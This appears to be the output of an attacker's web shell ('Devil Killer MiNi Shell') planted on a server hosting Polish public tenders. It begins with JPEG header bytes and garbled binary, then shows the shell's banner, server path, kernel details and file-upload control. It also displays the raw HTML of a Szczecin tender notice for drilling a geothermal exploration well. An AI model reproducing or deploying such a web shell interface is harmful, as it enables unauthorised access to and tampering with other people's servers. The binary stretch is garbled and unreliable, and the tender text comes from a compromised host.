JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250912/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250912/0042186001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Szczecin GT-2 w miejscowości Szczecin. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO SZCZECIN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Biuro ds. Zamówień Publicznych Urzędu Miasta Szczecin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Armii Krajowej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-456</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@um.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um.szczecin.pl/chapter_11760.asp</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Zakład Unieszkodliwiania Odpadów Sp. z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">8513140503</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Logistyczna 22</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">70-608</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">91 50 66 200</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">91 50 66 299</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@zuo.szczecin.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.bip.zuo.szczecin.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Szczecin GT-2 w miejscowości Szczecin. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9cb58438-9bfa-4ad9-9733-e263c6f4cb3a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00421860</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9cb58438-9bfa-4ad9-9733-e263c6f4cb3a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zgodnie z SWZ. https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-9cb58438-9bfa-4ad9-9733-e263c6f4cb3a</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXXIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WNIOŚ.251.2.2025.PA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonywanie otworu poszukiwawczo – rozpoznawczego wód termalnych Szczecin GT-2 w miejscowości Szczecin [dalej: „otwór”].<br/>2.	Zadanie jest dofinansowane ze środków Narodowego Funduszu Ochrony Środowiska Gospodarki Wodnej [dalej: „NFOŚiGW”] w ramach programu priorytetowego „Udostępnianie wód termalnych w Polsce”. Prace poszukiwawczo-rozpoznawcze prowadzone będą na podstawie i zgodnie z „Projektem robót geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Szczecin GT-2 w miejscowości Szczecin&#34; [dalej: „PRG”], zatwierdzonym decyzją Marszałka Województwa Zachodniopomorskiego znak: WOŚ-III.7430.11.2022.MM z dnia 29.06.2022 r. <br/>3.	Ramowy zakres prac przewidzianych do realizacji w ramach zamówienia przedstawia się następująco: <br/>1)	Prace przygotowawcze, w tym m.in.: pozyskanie niezbędnych zgód i decyzji zatwierdzających (w tym m. in. Plan ruchu dla wykonania otworu wiertniczego i prac geologicznych, zgłoszenia zamiaru rozpoczęcia robót geologicznych i poboru próbek), przygotowanie placu budowy do wiercenia, wykonanie dróg technologicznych i dojazdowych, montaż urządzeń wiertniczych, wykonanie rurociągów zrzutowych, przygotowanie zbiornika zrzutowego. <br/>2)	Wykonanie otworu poszukiwawczo-rozpoznawczego Szczecin GT-2, w tym m.in.: wiercenie do głębokości 1950 (+/-10%) m p.p.t. ujęcie do eksploatacji wybranej warstwy wodonośnej – zgodnie z PRG. <br/>3)	Badania hydrogeologiczne, w tym pompowania testowe każdego z przewierconych horyzontów wodonośnych, próbne pompowanie poziomu proterozoicznego, obejmujące ciągłe, automatyczne pomiary podstawowych parametrów eksploatacyjnych: wydajności wody termalnej, poziomu zwierciadła wody lub ciśnienia na głowicy, a także temperatury wody termalnej oraz przewodnictwa elektrolitycznego właściwego wody – zgodnie z PRG.<br/>4)	Badania geofizyczne obejmujące m.in.: wykonanie odcinkowych pomiarów geofizycznych przed rurowaniem ścian otworu Szczecin GT-2, pomiarów cementomierzem, końcowych pomiarów geofizycznych – zgodnie z PRG. <br/>5)	Demontaż urządzeń wiertniczych, rekultywacja terenu, demobilizacja, utylizacja odpadów. <br/>4.	Szczegółowy Opis przedmiotu zamówienia stanowi Załącznik nr 9 do SWZ [dalej: „OPZ”].<br/>5.	Miejsce świadczenia usługi: Projektowany otwór zlokalizowany jest w miejscowości Szczecin, gmina Szczecin, woj. Zachodniopomorskie na działce o nr ewidencyjnym 6/2, obręb 4084 Szczecin. Położenie projektowanego otworu w państwowym układzie współrzędnych z podaniem nazwy systemu odniesienia / układu współrzędnych: X: 5916008 Y: 5478368 (w przybliżeniu; układ PUWG 2000 strefa 5). Szczegółowa lokalizacja otworu zostanie wytyczona geodezyjnie w terenie przed rozpoczęciem robót wiertniczych. Obszary objęte ochroną w rejonie planowanego otworu: rodzaj obiektu: Szczeciński Park Krajobrazowy Puszcza Bukowa odległość w km 1,3; otwór zlokalizowany w granicach otuliny Szczecińskiego Parku Krajobrazowego Puszcza Bukowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45255500-4 - Roboty wiertnicze i górnicze</p> <p class="mb-0">71331000-7 - Wiertnicze usługi inżynieryjne</p> <p class="mb-0">71351200-5 - Geologiczne i geofizyczne usługi doradcze</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">71351913-6 - Usługi poszukiwań geologicznych</p> <p class="mb-0">71355200-3 - Wykonywanie badań</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71530000-2 - Doradcze usługi budowlane</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria oceny ofert: <br/>Kryterium nr 1 – „Cena” – 60%;<br/>Kryterium nr 2 – „Doświadczenie Kierownika Ruchu Zakładu” – 25%;<br/>Kryterium nr 3 – „Doświadczenie Kierowników Wiertni” – 15%.<br/>2.	Za najkorzystniejszą ofertę zostanie uznana oferta złożona przez wykonawcę niewykluczonego z udziału w Postępowaniu, który złożył ofertę niepodlegającą odrzuceniu, którego oferta uzyskała łącznie największą ilość punktów w kryteriach oceny ofert, obliczoną wg wzoru: <br/>O = C + DKR + DKW <br/>gdzie: <br/>O - suma punktów danej oferty;<br/>C - liczba uzyskanych punktów ocenianej oferty w kryterium nr 1 – „Cena”;<br/>DKR - liczba uzyskanych punktów ocenianej oferty w kryterium nr 2 – „Doświadczenie Kierownika Ruchu Zakładu”.<br/>DKW - liczba uzyskanych punktów ocenianej oferty w kryterium nr 3 – „Doświadczenie Kierownika Wiertni”.<br/>3.	Opis sposobu oceny ofert dla kryterium „Ceny”: <br/>C = (Cmin / Co) x 60 (max liczba punktów)<br/>gdzie: <br/>C – liczba uzyskanych punktów ocenianej oferty w kryterium nr 1 – „Cena”; <br/>Cmin – najniższa cena brutto spośród ważnych i nieodrzuconych ofert; <br/>Co – cena oferty ocenianej. <br/>4.	Opis sposobu oceny ofert dla kryterium „Doświadczenie Kierownika Ruchu Zakładu (DKR)”: <br/>W ramach tego kryterium ocena ofert będzie dokonana w oparciu o złożony przez wykonawcę Formularz ofertowy, według następujących zasad:<br/>1)	doświadczenie osoby, która będzie pełniła funkcję Kierownika Ruchu Zakładu – maksymalnie 25 pkt <br/>2 otwory – 0 pkt<br/>3 otwory – 5 pkt<br/>4 otwory – 10 pkt <br/>5 otworów – 15 pkt<br/>6 i więcej otworów – 25 pkt<br/>Liczba punktów zostanie przyznana w tym kryterium na podstawie zadeklarowanej przez Wykonawcę liczby inwestycji polegających na wykonaniu otworów wiertniczych o głębokości minimum 1500 m p.p.t. (każdy), podczas których wskazana osoba pełniła funkcję Kierownika Ruchu Zakładu - na zasadach określonych w SWZ.<br/>5.	Opis sposobu oceny ofert dla kryterium „Doświadczenie Kierowników Wiertni”: <br/>W ramach tego kryterium ocena ofert będzie dokonana w oparciu o złożony przez wykonawcę Formularz ofertowy, według następujących zasad:<br/>2)	doświadczenie osób, które będą pełniły funkcję Kierownika wiertni – maksymalnie 15 pkt.<br/>2 otwory - przez każdą z osób wskazanych do pełnienia funkcji Kierownika Wiertni – 0 pkt<br/>3 otwory - przez każdą z osób wskazanych do pełnienia funkcji Kierownika Wiertni – 5 pkt<br/>4 otwory - przez każdą z osób wskazanych do pełnienia funkcji Kierownika Wiertni – 10 pkt<br/>5 i więcej otworów - przez każdą z osób wskazanych do pełnienia funkcji Kierownika Wiertni – 15 pkt.<br/>Liczba punktów zostanie przyznana w tym kryterium na podstawie zadeklarowanej przez Wykonawcę dla każdej ze wskazanych osób ilości sprawowanych funkcji Kierownika Wiertni podczas wykonywania otworów wiertniczych o głębokości co najmniej 1500 m p.p.t. (każdy) w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert - na zasadach określonych w SWZ.<br/>6. Maksymalna łączna liczba punktów jaką może uzyskać wykonawca wynosi – 100 pkt. <br/>7.	Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>8.	Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>9.	Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zastosowane będą przepisy określone w art. 248 ust. 3 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie Kierownika Ruchu Zakładu”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie Kierowników Wiertni”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1. sytuacji ekonomicznej lub finansowej: <br/>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykonawca wykaże, że: posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 2 000 000,00 PLN (dwa miliony złotych). W przypadku składania oferty wspólnej ww. warunek wykonawcy mogą spełniać łącznie.<br/>2. zdolności technicznej lub zawodowej: <br/>Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne i zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że:<br/>1)	W okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie: 2 (dwie) roboty budowlane polegające na wykonaniu otworu wiertniczego o głębokości minimum 1500 m p.p.t. każdy, w tym jednego otworu geotermalnego.<br/><br/>Przez jedną robotę budowlaną należy rozumieć roboty budowlane wykonane na podstawie jednej umowy.<br/><br/>2)	Skieruje do realizacji zamówienia minimum:<br/>a)	jedną osobę na stanowisko Kierownika Ruchu Zakładu, która:<br/>-	posiada uprawnienia i kwalifikacje kierownika ruchu zakładu wykonującego roboty geologiczne metodą otworową, o których mowa w ustawie z dnia 9 czerwca 2011 r. Prawo Geologiczne i Górnicze (Dz.U. 2024 poz. 1290 ze zm.) potwierdzone w drodze świadectwa wydanego przez dyrektora okręgowego urzędu górniczego*,oraz<br/>-	legitymuje się doświadczeniem polegającym na pełnieniu funkcji Kierownika Ruchu Zakładu wykonującego roboty geologiczne metodą otworową przy co najmniej 2 (dwóch) zadaniach inwestycyjnych polegających na wykonaniu 2 (dwóch) otworów wiertniczych o głębokości co najmniej 1500 m p.p.t. każdy;<br/>b)	dwie osoby na stanowisko Kierowników Wiertni, z których każda:<br/>-	posiada uprawnienia i kwalifikacje wyższego dozoru ruchu w specjalności wiertniczej, o których mowa w ustawie z dnia 9 czerwca 2011 r. Prawo Geologiczne i Górnicze (Dz.U. 2024 poz. 1290 ze zm.) potwierdzone w drodze świadectwa wydanego przez dyrektora okręgowego urzędu górniczego* oraz<br/>-	posiada doświadczenie w sprawowaniu funkcji Kierownika Wiertni uzyskane w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert podczas wykonywania co najmniej 2 (dwóch) otworów wiertniczych o głębokości co najmniej 1500 m p.p.t. każdy;<br/>c)	cztery osoby na stanowiska Wiertaczy, z których każda:<br/>-	posiada uprawnienia i kwalifikacje wyższego dozoru ruchu w specjalności wiertniczej, o których mowa w ustawie z dnia 9 czerwca 2011 r. Prawo Geologiczne i Górnicze (Dz.U. 2024 poz. 1290 ze zm.) potwierdzone w drodze świadectwa wydanego przez dyrektora okręgowego urzędu górniczego* oraz<br/>-	posiada doświadczenie w sprawowaniu funkcji Wiertacza uzyskane w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert podczas wykonywania co najmniej 2 (dwóch) otworów wiertniczych o głębokości co najmniej 1500 m p.p.t. każdy.<br/>* lub posiadające odpowiadające im uprawnienia wydane na podstawie poprzednio obowiązujących przepisów albo odpowiadające im uprawnienia wydane w innych Państwach Członkowskich Unii Europejskiej.<br/><br/>Przez jedną robotę budowlaną należy rozumieć wykonanie roboty budowlanej na rzecz jednego podmiotu na podstawie jednej umowy.<br/><br/>Zamawiający nie dopuszcza łączenia wyżej wskazanych funkcji w zakresie uprawnień i doświadczenia tj. nie dopuszcza, aby jedna osoba sprawowała więcej niż jedną funkcję w trakcie realizacji zadania stanowiącego przedmiot zamówienia w Postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Na podstawie art. 274 ust 1 ustawy Pzp, ZAMAWIAJĄCY WEZWIE WYKONAWCĘ, którego oferta została oceniona najwyżej, do złożenia w terminie nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych:<br/>1)	Na potwierdzenie braku podstaw wykluczenia z udziału w Postępowaniu: <br/>a)	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed <br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru <br/>lub ewidencji.<br/>b)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616, z 2025 r. poz. 794), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ.<br/>c)	Oświadczenie wykonawcy o aktualności informacji zawartych w załączonym do oferty oświadczeniu o braku podstaw do wykluczenia, w zakresie art. 108 ust. 1 pkt 1)-6) ustawy Pzp, art. 109 ust. 1 pkt 7) ustawy Pzp oraz art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 